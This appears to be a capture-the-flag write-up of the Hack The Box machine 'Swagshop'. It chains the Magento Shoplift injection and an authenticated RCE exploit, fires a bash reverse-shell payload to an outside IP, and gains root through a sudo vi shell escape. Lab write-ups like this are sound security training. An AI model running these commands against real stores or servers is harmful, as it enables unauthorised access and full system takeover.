
HTB: Swagshop
An unpatched Magento 1.9 storefront. A blind injection writes us our own admin account, an authenticated exploit turns those credentials into code execution, and sudo rights on vi hand over root through a shell escape.
Our nmap scan shows this is a basic box. SSH and Apache, and the web server redirects to a swagshop.htb domain, so let's add that to our hosts file.

Heading over to the site we can already see it's a Magento app, selling Hack The Box merch.

Version matters a lot with Magento, so let's run magescan against it.
php magescan.phar scan:all http://swagshop.htb

Version 1.9.0.0, which is ancient. Let's see what's public for it.
searchsploit magento

Doing a little research we find a couple of things. There's a blind injection on this version, the Shoplift bug, that lets us create our own admin account outright. And separately there's an authenticated remote code execution. Those two chain together: the first gets us credentials, the second turns them into a shell.
Downloading the first exploit, all we have to do is point the target at the site's index path, since this install serves Magento from there rather than the web root.

python2 37977.py

That gets us an admin account we can work with. The injection inserts a row straight into the admin user table, so the account is real and fully privileged.
Now for the authenticated remote code execution. We just have to adjust it a bit and add the credentials we got from the previous step.

We also have to set the install date, and it has to match exactly. Looking back at the magescan output there's a readable configuration file left exposed.

That file has some juicy detail in it, including the install date the exploit needs. With that filled in we can fire it.
python3 37811.py http://swagshop.htb/index.php/admin/ "bash -c 'bash -i >& /dev/tcp/10.10.14.211/443 0>&1'"

The read timeout at the end is expected on a shell payload. We get execution as the web server user. Let's head over to the home directory and check the user's desktop.
cat /home/haris/user.txt

We get our user flag. Now let's head for privilege escalation. Running linPEAS on the machine shows what we can run with elevated rights.
sudo -l

We can run vi as root against any file under the web root, with no password. Looking at GTFOBins, that's a straight break-out: vi can spawn a shell from inside itself, and since the editor is already running as root, so is the shell.
sudo /usr/bin/vi /var/www/html/index.php
Then inside the editor.
:!/bin/sh

And we have root. Heading over to the root directory we can grab our root flag.
cat /root/root.txt

This was a pretty easy box. Had to do a little more research than usual but found everything pretty quick. Learned a bit about Magento, and not to use it when building an ecommerce store.
